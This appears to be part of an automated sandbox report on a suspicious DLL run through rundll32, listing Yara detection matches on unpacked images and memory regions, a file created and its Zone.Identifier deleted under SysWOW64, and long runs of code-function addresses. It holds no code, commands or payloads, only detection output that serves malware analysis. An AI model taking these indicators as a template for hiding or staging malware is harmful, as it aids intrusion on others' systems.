                      Source: Yara matchFile source: 4.2.rundll32.exe.30a0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.4630000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.3fc0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.rundll32.exe.41a0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.56b0000.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.48e0000.8.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.5810000.8.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.5810000.8.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.3380000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.3f80000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.5840000.9.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.5970000.12.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.48b0000.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.30a0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.48e0000.8.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.4ea0000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.5600000.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.30d0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.4f80000.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.5ac0000.15.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000007.00000002.1231555705.0000000003380000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.715083656.00000000042D1000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.1232688117.0000000005A90000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.1232050333.0000000004ED1000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.712245563.00000000046E0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.712289758.0000000004711000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.1232447127.0000000005810000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.1232307431.0000000005601000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.1231756136.00000000034D1000.00000020.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.1232722292.0000000005AC1000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.1232778778.0000000005BA0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.1232026757.0000000004EA0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.1232814811.0000000005BD1000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.1232471736.0000000005841000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.1232588764.0000000005970000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.712514212.00000000048B1000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.712664698.0000000004911000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.712162779.0000000004631000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.1232613063.00000000059A1000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.712727948.0000000004A40000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.1232537029.00000000058B1000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.1232513916.0000000005880000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.1232107048.0000000004F80000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.714978387.00000000041A0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.711795712.0000000004040000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.710421091.00000000030D1000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.711701070.0000000003FC1000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.712440145.0000000004880000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.712583531.00000000048E0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.1232396043.00000000056E1000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.1232361987.00000000056B0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.712769808.0000000004A71000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.711647577.0000000003F80000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.710385050.00000000030A0000.00000040.00000001.sdmp, type: MEMORY

                      System Summary:

                      barindex
                      Source: spZRMihlrkFGqYq1f.dllStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                      Source: C:\Windows\SysWOW64\rundll32.exeFile deleted: C:\Windows\SysWOW64\Feetevsox\qeijjyafbaho.gis:Zone.IdentifierJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\SysWOW64\Feetevsox\Jump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_1003F0303_2_1003F030
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_1003D3223_2_1003D322
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_100104FC3_2_100104FC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_1003B57C3_2_1003B57C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_1004C6683_2_1004C668
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_10040E8A3_2_10040E8A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_030E43B34_2_030E43B3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_030D441E4_2_030D441E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_030ECAA84_2_030ECAA8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_030D23094_2_030D2309
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_030D35024_2_030D3502
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_030D251C4_2_030D251C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_030EFD104_2_030EFD10
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_030F292B4_2_030F292B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_030D6B254_2_030D6B25
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_030D59234_2_030D5923
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_030F0B344_2_030F0B34
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_030EF14D4_2_030EF14D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_030D33454_2_030D3345
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_030F13434_2_030F1343
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_030D3F5C4_2_030D3F5C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_030DC1584_2_030DC158
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_030E056A4_2_030E056A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_030E1F6B4_2_030E1F6B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_030E577E4_2_030E577E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_030D758F4_2_030D758F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_030E4D8D4_2_030E4D8D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_030D4F8E4_2_030D4F8E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_030D93844_2_030D9384
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_030ED99A4_2_030ED99A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_030EB3974_2_030EB397
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_030DFD914_2_030DFD91
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_030F11934_2_030F1193
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_030E4BAA4_2_030E4BAA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_030E2FA24_2_030E2FA2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_030E9DA14_2_030E9DA1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_030EB1B54_2_030EB1B5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_030DBFB64_2_030DBFB6
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_030E7BB24_2_030E7BB2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_030D6FC44_2_030D6FC4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_030F25C34_2_030F25C3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_030DA3DF4_2_030DA3DF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_030D55E84_2_030D55E8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_030EBFE84_2_030EBFE8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_030DC5FE4_2_030DC5FE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_030F03F14_2_030F03F1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_030D8C094_2_030D8C09
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_030D1A0A4_2_030D1A0A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_030D220A4_2_030D220A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_030D4C004_2_030D4C00
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_030DE21C4_2_030DE21C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_030DF41F4_2_030DF41F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_030E1C104_2_030E1C10
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_030DEC274_2_030DEC27
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_030E52204_2_030E5220
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_030DD2234_2_030DD223
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_030D9E224_2_030D9E22
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_030EF83F4_2_030EF83F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_030F1A3C4_2_030F1A3C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_030DA0484_2_030DA048
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_030D38454_2_030D3845
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_030D2A464_2_030D2A46
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_030D20434_2_030D2043
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_030EE4414_2_030EE441
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_030D26544_2_030D2654
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_030D9A574_2_030D9A57
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_030E406E4_2_030E406E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_030D1C764_2_030D1C76
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_030DCC8D4_2_030DCC8D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_030E4E8A4_2_030E4E8A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_030E748A4_2_030E748A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_030F06874_2_030F0687
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_030D72834_2_030D7283
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_030EAC9B4_2_030EAC9B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_030DAC954_2_030DAC95
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_030D3C914_2_030D3C91
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_030ED0914_2_030ED091
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_030DDAAE4_2_030DDAAE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_030E44AA4_2_030E44AA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_030ED6A74_2_030ED6A7
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_030E78A54_2_030E78A5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_030DFEA04_2_030DFEA0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_030E98BD4_2_030E98BD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_030E90BA4_2_030E90BA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_030D5AB24_2_030D5AB2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_030EBEC94_2_030EBEC9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_030E0ADE4_2_030E0ADE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_030ECCD44_2_030ECCD4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_030F08D14_2_030F08D1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_030E7ED14_2_030E7ED1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_030EAEEB4_2_030EAEEB
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_030EECE34_2_030EECE3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_030EDEF44_2_030EDEF4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_030D30F64_2_030D30F6
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_030EA8F04_2_030EA8F0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_042D441E6_2_042D441E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_042ECAA86_2_042ECAA8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_042E43B36_2_042E43B3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_042DEC276_2_042DEC27
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_042E52206_2_042E5220
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_042DD2236_2_042DD223
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_042D9E226_2_042D9E22
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_042EF83F6_2_042EF83F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_042F1A3C6_2_042F1A3C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_042D8C096_2_042D8C09
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_042D1A0A6_2_042D1A0A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_042D220A6_2_042D220A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_042D4C006_2_042D4C00
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_042DE21C6_2_042DE21C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_042DF41F6_2_042DF41F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_042E1C106_2_042E1C10
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_042E406E6_2_042E406E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_042D1C766_2_042D1C76
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_042DA0486_2_042DA048
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_042D38456_2_042D3845
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_042D2A466_2_042D2A46
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_042D20436_2_042D2043
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_042EE4416_2_042EE441
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_042D26546_2_042D2654
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_042D9A576_2_042D9A57
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_042DDAAE6_2_042DDAAE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_042E44AA6_2_042E44AA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_042ED6A76_2_042ED6A7
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_042E78A56_2_042E78A5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_042DFEA06_2_042DFEA0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_042E98BD6_2_042E98BD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_042E90BA6_2_042E90BA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_042D5AB26_2_042D5AB2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_042DCC8D6_2_042DCC8D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_042E4E8A6_2_042E4E8A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_042E748A6_2_042E748A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_042F06876_2_042F0687
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_042D72836_2_042D7283
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_042EAC9B6_2_042EAC9B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_042DAC956_2_042DAC95
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_042D3C916_2_042D3C91
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_042ED0916_2_042ED091
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_042EAEEB6_2_042EAEEB
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_042EECE36_2_042EECE3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_042EDEF46_2_042EDEF4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_042D30F66_2_042D30F6
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_042EA8F06_2_042EA8F0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_042EBEC96_2_042EBEC9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_042E0ADE6_2_042E0ADE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_042ECCD46_2_042ECCD4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_042F08D16_2_042F08D1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_042E7ED16_2_042E7ED1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_042F292B6_2_042F292B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_042D6B256_2_042D6B25
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_042D59236_2_042D5923
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_042F0B346_2_042F0B34
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_042D23096_2_042D2309
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_042D35026_2_042D3502
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_042D251C6_2_042D251C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_042EFD106_2_042EFD10
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_042E056A6_2_042E056A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_042E1F6B6_2_042E1F6B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_042E577E6_2_042E577E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_042EF14D6_2_042EF14D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_042D33456_2_042D3345
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_042F13436_2_042F1343
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_042D3F5C6_2_042D3F5C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_042DC1586_2_042DC158
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_042E4BAA6_2_042E4BAA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_042E2FA26_2_042E2FA2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_042E9DA16_2_042E9DA1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_042EB1B56_2_042EB1B5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_042DBFB66_2_042DBFB6
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_042E7BB26_2_042E7BB2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_042D758F6_2_042D758F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_042E4D8D6_2_042E4D8D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_042D4F8E6_2_042D4F8E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_042D93846_2_042D9384
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_042ED99A6_2_042ED99A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_042EB3976_2_042EB397
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_042DFD916_2_042DFD91
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_042F11936_2_042F1193
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_042D55E86_2_042D55E8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_042EBFE86_2_042EBFE8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_042DC5FE6_2_042DC5FE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_042F03F16_2_042F03F1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_042D6FC46_2_042D6FC4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_042F25C36_2_042F25C3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_042DA3DF6_2_042DA3DF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04EEECE37_2_04EEECE3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04EEDEF47_2_04EEDEF4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04ED30F67_2_04ED30F6
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04EF08D17_2_04EF08D1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04EE7ED17_2_04EE7ED1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04EE44AA7_2_04EE44AA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04EE78A57_2_04EE78A5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04ED5AB27_2_04ED5AB2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04EE748A7_2_04EE748A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04EDAC957_2_04EDAC95
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04ED38457_2_04ED3845
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04ED20437_2_04ED2043
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04EDEC277_2_04EDEC27
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04EE52207_2_04EE5220
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04EEF83F7_2_04EEF83F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04ED220A7_2_04ED220A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04ED441E7_2_04ED441E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04ED55E87_2_04ED55E8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04EDC5FE7_2_04EDC5FE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04ED6FC47_2_04ED6FC4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04EE4BAA7_2_04EE4BAA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04EE2FA27_2_04EE2FA2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04EDBFB67_2_04EDBFB6
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04ED758F7_2_04ED758F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04ED93847_2_04ED9384
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04EF0B347_2_04EF0B34
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04EEAEEB7_2_04EEAEEB
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04EEA8F07_2_04EEA8F0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04EEBEC97_2_04EEBEC9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04EE0ADE7_2_04EE0ADE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04EECCD47_2_04EECCD4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04EDDAAE7_2_04EDDAAE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04EECAA87_2_04EECAA8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04EED6A77_2_04EED6A7
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04EDFEA07_2_04EDFEA0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04EE98BD7_2_04EE98BD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04EE90BA7_2_04EE90BA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04EDCC8D7_2_04EDCC8D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04EE4E8A7_2_04EE4E8A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04EF06877_2_04EF0687
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04ED72837_2_04ED7283
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04EEAC9B7_2_04EEAC9B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04ED3C917_2_04ED3C91
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04EED0917_2_04EED091
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04EE406E7_2_04EE406E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04ED1C767_2_04ED1C76
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04EDA0487_2_04EDA048
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04ED2A467_2_04ED2A46
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04EEE4417_2_04EEE441
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04ED26547_2_04ED2654
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04ED9A577_2_04ED9A57
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04EDD2237_2_04EDD223
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04ED9E227_2_04ED9E22
